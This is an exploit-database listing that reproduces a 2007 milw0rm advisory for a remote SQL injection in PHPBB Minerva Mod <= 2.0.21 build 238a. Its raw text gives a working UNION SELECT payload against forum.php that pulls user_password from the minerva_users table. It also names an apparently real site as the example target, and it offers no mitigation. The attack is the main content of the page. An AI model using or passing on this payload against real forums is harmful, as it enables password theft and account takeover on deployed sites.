header-logo
Suggest Exploit
vendor:
PHPBB Minerva Mod
by:
xoron
N/A
CVSS
N/A
Remote SQL Injection
CWE
Product Name: PHPBB Minerva Mod
Affected Version From: <= 2.0.21 build 238a
Affected Version To: <= 2.0.21 build 238a
Patch Exists: Unknown
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection on PHPBB Minerva Mod version 2.0.21 build 238a through the 'forum.php' file. The vulnerability allows the attacker to extract the user password from the 'minerva_users' table by manipulating the 'user_id' parameter.

Mitigation:

Unknown
Source

Exploit-DB raw data:

======================X=O=R=O=N=====================
+
+ PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ forum.php ?c=-1/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*
+
======================X=O=R=O=N=====================
+
+ Example: http://www.ayyquerico.com/Portal/
+
======================X=O=R=O=N=====================
+
+ Special thanx: ajann
+
======================X=O=R=O=N=====================

# milw0rm.com [2007-03-19]

Navigation

Suggest Exploit

Services By CQR